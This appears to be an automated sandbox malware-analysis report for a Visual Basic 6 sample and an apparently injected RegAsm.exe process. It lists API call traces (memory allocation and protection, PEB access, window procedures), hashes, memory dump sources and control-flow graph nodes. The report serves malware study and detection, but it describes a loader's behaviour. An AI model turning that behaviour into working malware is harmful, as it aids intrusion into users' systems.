                                                                    • Opcode ID: 995c27a4e961136fcff36fc589c1baeec5b886c040a38b9eb225f203851ea94c
                                                                    • Instruction ID: 77ed029945c8efc2dff3500f63b80e3daf343d6c340a12107d027f5788801437
                                                                    • Opcode Fuzzy Hash: 995c27a4e961136fcff36fc589c1baeec5b886c040a38b9eb225f203851ea94c
                                                                    • Instruction Fuzzy Hash: 1621E470900208EFCB10DFA9D956BEDBFB4FB08748F10842AF509BB2A0C37899549F94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60 ref: 0057D256
                                                                    • #644.MSVBVM60(?), ref: 0057D25F
                                                                    • #644.MSVBVM60(?,0054AC70,00000000,?), ref: 0057D274
                                                                    • #644.MSVBVM60(?,0054AC90,00000000,?,0054AC70,00000000,?), ref: 0057D289
                                                                    • #644.MSVBVM60(?,0054AC80,00000000,?,0054AC90,00000000,?,0054AC70,00000000,?), ref: 0057D2A2
                                                                      • Part of subcall function 0057D2D1: __vbaChkstk.MSVBVM60(?,0057D2B4,?,?,0054AC80,00000000,?,0054AC90,00000000,?,0054AC70,00000000,?), ref: 0057D2D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: #644$Chkstk__vba
                                                                    • String ID:
                                                                    • API String ID: 1305800526-0
                                                                    • Opcode ID: 3f2d00f84b847e8ae39aa272949e2ef526bab372e84644abb87a3c920caaa3c1
                                                                    • Instruction ID: 3b14fb139c3a1e45484f0b7d5adbaf8ed892dbce584cffb3a9499ea8aba0e7c1
                                                                    • Opcode Fuzzy Hash: 3f2d00f84b847e8ae39aa272949e2ef526bab372e84644abb87a3c920caaa3c1
                                                                    • Instruction Fuzzy Hash: CE014F71940209BFEB51AF60DC82EAE7F74FF04398F108125FD04AA161C6759D1096A5
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054AE98
                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,00401006), ref: 0054AEB0
                                                                    • #717.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401006), ref: 0054AEC4
                                                                    • __vbaVarMove.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401006), ref: 0054AECF
                                                                    • __vbaFreeVar.MSVBVM60(0054AEFF,?,00000000,00000080,00000000,?,?,?,?,00401006), ref: 0054AEF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#717ChkstkFreeMove
                                                                    • String ID:
                                                                    • API String ID: 3540157982-0
                                                                    • Opcode ID: 33e6b09f80c1add19c6ad179ccdcfc45ec4aa2b82ec43b88bbbc1ed25375df1b
                                                                    • Instruction ID: 05fe1289c4fe5bb7745df040b5973151ba910a6ef276fb2ee4496ad895f3301a
                                                                    • Opcode Fuzzy Hash: 33e6b09f80c1add19c6ad179ccdcfc45ec4aa2b82ec43b88bbbc1ed25375df1b
                                                                    • Instruction Fuzzy Hash: FDF06231880248BACB11EB91C942FCEBB7CFB14B48F50456AF001B64D1DA786A088B55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054E50F
                                                                    • #717.MSVBVM60(?,?,00000040,00000000,?,?,?,?,00401006), ref: 0054E52C
                                                                    • __vbaVarMove.MSVBVM60(?,?,00000040,00000000,?,?,?,?,00401006), ref: 0054E537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#717ChkstkMove
                                                                    • String ID: HW
                                                                    • API String ID: 3640671369-1255872628
                                                                    • Opcode ID: 8bc517829fc4d47701092136363c780debf660f647e3beda170b32d9a4b87d55
                                                                    • Instruction ID: b5ff55e2a0a6215b39c7051d8006765ff41dbdf04347eb0a237106806d3b5b52
                                                                    • Opcode Fuzzy Hash: 8bc517829fc4d47701092136363c780debf660f647e3beda170b32d9a4b87d55
                                                                    • Instruction Fuzzy Hash: 9FF03071980348BACB10EB95CD47FCDBB7CBB04B48F50886AB104B6591D6B969058B58
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0057D0FE
                                                                    • #595.MSVBVM60(?,00401006,?,0000000A,0000000A), ref: 0057D13F
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,00401006,?,0000000A,0000000A), ref: 0057D154
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,00401006,?,0000000A,0000000A), ref: 0057D163
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#595ChkstkFreeListMove
                                                                    • String ID:
                                                                    • API String ID: 2550330671-0
                                                                    • Opcode ID: 08060c4bc8039888ac434c1447b6bcb412fdd457d498d7ed0a810e6425da5f27
                                                                    • Instruction ID: 632d0c11abbd343be3cad4f2ac46968a186bc1afa364e5119c49d4e8c4163a6d
                                                                    • Opcode Fuzzy Hash: 08060c4bc8039888ac434c1447b6bcb412fdd457d498d7ed0a810e6425da5f27
                                                                    • Instruction Fuzzy Hash: F90157B1800248ABDB01DF91E946BCEBBB9EF04704F60852AF504B6191D3795A04CF65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054C4CA
                                                                    • __vbaSetSystemError.MSVBVM60 ref: 0054C4D7
                                                                    • __vbaSetSystemError.MSVBVM60(000001F4), ref: 0054C4EC
                                                                    • __vbaSetSystemError.MSVBVM60(000001F4), ref: 0054C4F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$Chkstk
                                                                    • String ID:
                                                                    • API String ID: 2749639637-0
                                                                    • Opcode ID: 67c88c8678b3816b67fce942dffdb7424d6f3d145085b8e81d73168c1fd07f5b
                                                                    • Instruction ID: 167fabb3480963c0532fbb014ba96de32cbd359a3d750e209762ba9942f01327
                                                                    • Opcode Fuzzy Hash: 67c88c8678b3816b67fce942dffdb7424d6f3d145085b8e81d73168c1fd07f5b
                                                                    • Instruction Fuzzy Hash: E4F07074D0030AEADF00EBF5C9455DDBBB4BF04748F10456AE550BB291DB799A408B55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ACEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Chkstk__vba
                                                                    • String ID: W$W
                                                                    • API String ID: 1959723978-3854619544
                                                                    • Opcode ID: f9466ddc4f523cf730584f6e062ab94fe7970b3abecc588e31f93eb27ebc7194
                                                                    • Instruction ID: 5e3d41e47ed38e3d7adb32910897f13f3f2918b9d04f8fb0645be6f47cec0533
                                                                    • Opcode Fuzzy Hash: f9466ddc4f523cf730584f6e062ab94fe7970b3abecc588e31f93eb27ebc7194
                                                                    • Instruction Fuzzy Hash: DF01D675A00648EFCB01DF58C946B8DBFF4FB08794F108465F809DB650C335AA40CB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0055317C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Chkstk__vba
                                                                    • String ID: XW$XW
                                                                    • API String ID: 1959723978-594280377
                                                                    • Opcode ID: 61cf63773496fc83a4221ad31ea967d175b71bcb02c571d9aebff492ce353bca
                                                                    • Instruction ID: 514b4ad9638f6f6d7debc9d2606c0dc11d66edea9af3b5ff2568f4f3154ab096
                                                                    • Opcode Fuzzy Hash: 61cf63773496fc83a4221ad31ea967d175b71bcb02c571d9aebff492ce353bca
                                                                    • Instruction Fuzzy Hash: 1F01D675A00648EFCB01DF59C546B8DBFF4FB08794F108465F809DB650C375AA408B94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005531EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Chkstk__vba
                                                                    • String ID: `W$`W
                                                                    • API String ID: 1959723978-546547367
                                                                    • Opcode ID: 8f69785c7c8fd6a7404530031fbdb4ed4262bf54e25681932da6af3f3a0ade19
                                                                    • Instruction ID: 6e1140320548d24654d2e68ae4615a090845963bd47da4fd00c8c3ad786d7ddf
                                                                    • Opcode Fuzzy Hash: 8f69785c7c8fd6a7404530031fbdb4ed4262bf54e25681932da6af3f3a0ade19
                                                                    • Instruction Fuzzy Hash: 1901D675A00648EFCB11DF58C546B8DBFF4FB08794F108465F809DB650C335AA408B94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BD83
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,0057F210,00000011,00000001,0000003F,00000000,?,?,?,?,00401006), ref: 0054BDA9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkRedim
                                                                    • String ID: XW
                                                                    • API String ID: 253803413-708546550
                                                                    • Opcode ID: 44db4609b1435de30a5a374587905f2891474fb50a27c2c5159ecbec4bc16b3b
                                                                    • Instruction ID: 8a346568657ca714917985bc2c07687727308a8c2364c91a2c34258540d36eaf
                                                                    • Opcode Fuzzy Hash: 44db4609b1435de30a5a374587905f2891474fb50a27c2c5159ecbec4bc16b3b
                                                                    • Instruction Fuzzy Hash: 47E0D870BD0344B6F5249B458C47F967E6CFB14F44F2044A9F3007A5C2D2FA65405165

                                                                    Execution Graph

                                                                    Execution Coverage:8.4%
                                                                    Dynamic/Decrypted Code Coverage:81.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:107
                                                                    Total number of Limit Nodes:9
                                                                    execution_graph 40532 444095 40533 4439aa 40532->40533 40534 44409a NtProtectVirtualMemory 40533->40534 40406 2ea0848 40408 2ea084e 40406->40408 40407 2ea091b 40408->40407 40411 2ea1382 40408->40411 40415 2ea1390 40408->40415 40413 2ea138b 40411->40413 40412 2ea1488 40412->40408 40413->40412 40419 2ea7ec0 40413->40419 40417 2ea1396 40415->40417 40416 2ea1488 40416->40408 40417->40416 40418 2ea7ec0 GlobalMemoryStatusEx 40417->40418 40418->40417 40420 2ea7eca 40419->40420 40421 2ea7ee4 40420->40421 40424 68cda08 40420->40424 40428 68cd9fa 40420->40428 40421->40413 40426 68cda1d 40424->40426 40425 68cdc32 40425->40421 40426->40425 40427 68cdc48 GlobalMemoryStatusEx 40426->40427 40427->40426 40430 68cda1d 40428->40430 40429 68cdc32 40429->40421 40430->40429 40431 68cdc48 GlobalMemoryStatusEx 40430->40431 40431->40430 40535 441adc 40536 441a78 40535->40536 40539 443b38 GetPEB 40536->40539 40432 6a1c5c8 40433 6a1c5f3 40432->40433 40434 6a1c6a2 40433->40434 40437 6a1d4a0 40433->40437 40440 6a1d490 40433->40440 40448 6a1a464 40437->40448 40441 6a1d496 40440->40441 40441->40441 40442 6a1d4a6 40441->40442 40445 6a1d4de CreateWindowExW 40441->40445 40443 6a1d4d5 40442->40443 40444 6a1a464 CreateWindowExW 40442->40444 40443->40434 40444->40443 40447 6a1d614 40445->40447 40447->40447 40449 6a1d4f0 CreateWindowExW 40448->40449 40451 6a1d614 40449->40451 40452 443a8e 40453 443c34 NtAllocateVirtualMemory 40452->40453 40454 13bd030 40455 13bd048 40454->40455 40456 13bd0a2 40455->40456 40461 6a1d697 40455->40461 40465 6a1a48c 40455->40465 40474 6a1d6a8 40455->40474 40478 6a1e7f8 40455->40478 40462 6a1d6a5 40461->40462 40463 6a1a48c CallWindowProcW 40462->40463 40464 6a1d6ef 40463->40464 40464->40456 40468 6a1a497 40465->40468 40466 6a1e869 40470 6a1e867 40466->40470 40503 6a1e46c 40466->40503 40468->40466 40469 6a1e859 40468->40469 40487 6a1e980 40469->40487 40492 6a1ea5c 40469->40492 40498 6a1e990 40469->40498 40475 6a1d6ce 40474->40475 40476 6a1a48c CallWindowProcW 40475->40476 40477 6a1d6ef 40476->40477 40477->40456 40481 6a1e835 40478->40481 40479 6a1e869 40480 6a1e46c CallWindowProcW 40479->40480 40483 6a1e867 40479->40483 40480->40483 40481->40479 40482 6a1e859 40481->40482 40484 6a1e980 CallWindowProcW 40482->40484 40485 6a1e990 CallWindowProcW 40482->40485 40486 6a1ea5c CallWindowProcW 40482->40486 40484->40483 40485->40483 40486->40483 40488 6a1e991 40487->40488 40507 6a1ea38 40488->40507 40511 6a1ea48 40488->40511 40489 6a1ea30 40489->40470 40493 6a1ea1a 40492->40493 40494 6a1ea6a 40492->40494 40496 6a1ea38 CallWindowProcW 40493->40496 40497 6a1ea48 CallWindowProcW 40493->40497 40495 6a1ea30 40495->40470 40496->40495 40497->40495 40500 6a1e9a4 40498->40500 40499 6a1ea30 40499->40470 40501 6a1ea38 CallWindowProcW 40500->40501 40502 6a1ea48 CallWindowProcW 40500->40502 40501->40499 40502->40499 40504 6a1e477 40503->40504 40505 6a1fcca CallWindowProcW 40504->40505 40506 6a1fc79 40504->40506 40505->40506 40506->40470 40508 6a1ea48 40507->40508 40509 6a1ea59 40508->40509 40514 6a1fc00 40508->40514 40509->40489 40512 6a1ea59 40511->40512 40513 6a1fc00 CallWindowProcW 40511->40513 40512->40489 40513->40512 40515 6a1e46c CallWindowProcW 40514->40515 40516 6a1fc1a 40515->40516 40516->40509 40517 441b69 40518 441b6c 40517->40518 40524 443846 GetPEB 40518->40524 40520 44204a 40521 441f70 40520->40521 40522 4437ee GetPEB 40520->40522 40523 4420a5 40522->40523 40525 443e87 40524->40525 40526 44172a 40528 4416d2 40526->40528 40528->40528 40530 441752 40528->40530 40531 443e2e GetPEB 40528->40531

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 126 68c1018-68c1039 127 68c103b-68c103e 126->127 128 68c1064-68c1067 127->128 129 68c1040-68c105f 127->129 130 68c106d-68c108c 128->130 131 68c1808-68c180a 128->131 129->128 139 68c108e-68c1091 130->139 140 68c10a5-68c10af 130->140 133 68c180c 131->133 134 68c1811-68c1814 131->134 133->134 134->127 136 68c181a-68c1823 134->136 139->140 141 68c1093-68c10a3 139->141 143 68c10b5-68c10c4 140->143 141->143 252 68c10c6 call 68c1838 143->252 253 68c10c6 call 68c1830 143->253 145 68c10cb-68c10d0 146 68c10dd-68c13ba 145->146 147 68c10d2-68c10d8 145->147 168 68c17fa-68c1807 146->168 169 68c13c0-68c146f 146->169 147->136 178 68c1498 169->178 179 68c1471-68c1496 169->179 181 68c14a1-68c14b4 178->181 179->181 183 68c14ba-68c14dc 181->183 184 68c17e1-68c17ed 181->184 183->184 187 68c14e2-68c14ec 183->187 184->169 185 68c17f3 184->185 185->168 187->184 188 68c14f2-68c14fd 187->188 188->184 189 68c1503-68c15d9 188->189 201 68c15db-68c15dd 189->201 202 68c15e7-68c1617 189->202 201->202 206 68c1619-68c161b 202->206 207 68c1625-68c1631 202->207 206->207 208 68c1691-68c1695 207->208 209 68c1633-68c1637 207->209 210 68c169b-68c16d7 208->210 211 68c17d2-68c17db 208->211 209->208 212 68c1639-68c1663 209->212 223 68c16d9-68c16db 210->223 224 68c16e5-68c16f3 210->224 211->184 211->189 219 68c1665-68c1667 212->219 220 68c1671-68c168e 212->220 219->220 220->208 223->224 226 68c170a-68c1715 224->226 227 68c16f5-68c1700 224->227 231 68c172d-68c173e 226->231 232 68c1717-68c171d 226->232 227->226 230 68c1702 227->230 230->226 236 68c1756-68c1762 231->236 237 68c1740-68c1746 231->237 233 68c171f 232->233 234 68c1721-68c1723 232->234 233->231 234->231 241 68c177a-68c17cb 236->241 242 68c1764-68c176a 236->242 238 68c1748 237->238 239 68c174a-68c174c 237->239 238->236 239->236 241->211 243 68c176c 242->243 244 68c176e-68c1770 242->244 243->241 244->241 252->145 253->145
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2540310464.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_68c0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q$$q$$q
                                                                    • API String ID: 0-2069967915
                                                                    • Opcode ID: b9140e316d41bd5528f12802c4beac23d31d17d5b4bc957728219fc1e8fb14f7
                                                                    • Instruction ID: ed87fd24629fe6e54a53b2960cd02ae4ba6ae8848b10867555b3015e8c16399f
                                                                    • Opcode Fuzzy Hash: b9140e316d41bd5528f12802c4beac23d31d17d5b4bc957728219fc1e8fb14f7
                                                                    • Instruction Fuzzy Hash: FC322E35E107198FDB14EF69D89469DF7B2FF89300F20C669E549A7215EB30E985CB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.2538140537.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_2ea0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3
                                                                    • API String ID: 0-1842515611
                                                                    • Opcode ID: 7a8e860d296e067dde51a0d37345777b5aff423104cd614ef60911866102606b
                                                                    • Instruction ID: ed23984c0101fe67288bc6f147234a91c63873dd0fd58c0c77a860a101816f4f
                                                                    • Opcode Fuzzy Hash: 7a8e860d296e067dde51a0d37345777b5aff423104cd614ef60911866102606b
                                                                    • Instruction Fuzzy Hash: 8E53FA31C10B1A8ADB51EF68C890699F7B1FF99300F15D79AE4587B121FB70AAD4CB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1386 68c5d50-68c5d6e 1388 68c5d70-68c5d73 1386->1388 1389 68c5d8a-68c5d8d 1388->1389 1390 68c5d75-68c5d83 1388->1390 1391 68c5dae-68c5db1 1389->1391 1392 68c5d8f-68c5da9 1389->1392 1396 68c5d85 1390->1396 1397 68c5df6-68c5e0c 1390->1397 1394 68c5dd4-68c5dd7 1391->1394 1395 68c5db3-68c5dcf 1391->1395 1392->1391 1399 68c5dd9-68c5de3 1394->1399 1400 68c5de4-68c5de6 1394->1400 1395->1394 1396->1389 1406 68c6027-68c602a 1397->1406 1407 68c5e12-68c5e1b 1397->1407 1401 68c5ded-68c5df0 1400->1401 1402 68c5de8 1400->1402 1401->1388 1401->1397 1402->1401 1411 68c602c-68c6031 1406->1411 1409 68c5e21-68c5e3e 1407->1409 1410 68c6032-68c603c 1407->1410 1421 68c6014-68c6021 1409->1421 1422 68c5e44-68c5e6c 1409->1422 1414 68c608d-68c609e 1410->1414 1415 68c603e-68c6067 1410->1415 1425 68c609f 1414->1425 1426 68c6083-68c6087 1414->1426 1416 68c6069-68c606c 1415->1416 1418 68c62a1-68c62a4 1416->1418 1419 68c6072-68c6081 1416->1419 1423 68c62a6-68c62c2 1418->1423 1424 68c62c7-68c62ca 1418->1424 1419->1426 1431 68c60a0-68c60e4 1419->1431 1421->1406 1421->1407 1422->1421 1441 68c5e72-68c5e7b 1422->1441 1423->1424 1429 68c6375-68c6377 1424->1429 1430 68c62d0-68c62dc 1424->1430 1425->1411 1425->1431 1426->1414 1432 68c637e-68c6381 1429->1432 1433 68c6379 1429->1433 1437 68c62e7-68c62e9 1430->1437 1439 68c60ea-68c60fb 1431->1439 1440 68c6275-68c628a 1431->1440 1432->1416 1436 68c6387-68c6390 1432->1436 1433->1432 1443 68c62eb-68c62f1 1437->1443 1444 68c6301-68c6305 1437->1444 1453 68c6260-68c626f 1439->1453 1454 68c6101-68c611e 1439->1454 1440->1418 1441->1410 1450 68c5e81-68c5e9d 1441->1450 1445 68c62f5-68c62f7 1443->1445 1446 68c62f3 1443->1446 1448 68c6307-68c6311 1444->1448 1449 68c6313 1444->1449 1445->1444 1446->1444 1452 68c6318-68c631a 1448->1452 1449->1452 1458 68c6002-68c600e 1450->1458 1459 68c5ea3-68c5ecd 1450->1459 1455 68c631c-68c631f 1452->1455 1456 68c632b-68c6364 1452->1456 1453->1439 1453->1440 1454->1453 1466 68c6124-68c621a call 68c4570 1454->1466 1455->1436 1456->1419 1474 68c636a-68c6374 1456->1474 1458->1421 1458->1441 1472 68c5ff8-68c5ffd 1459->1472 1473 68c5ed3-68c5efb 1459->1473 1522 68c621c-68c6226 1466->1522 1523 68c6228 1466->1523 1472->1458 1473->1472 1481 68c5f01-68c5f2f 1473->1481 1481->1472 1486 68c5f35-68c5f3e 1481->1486 1486->1472 1488 68c5f44-68c5f76 1486->1488 1495 68c5f78-68c5f7c 1488->1495 1496 68c5f81-68c5f9d 1488->1496 1495->1472 1497 68c5f7e 1495->1497 1496->1458 1498 68c5f9f-68c5ff6 call 68c4570 1496->1498 1497->1496 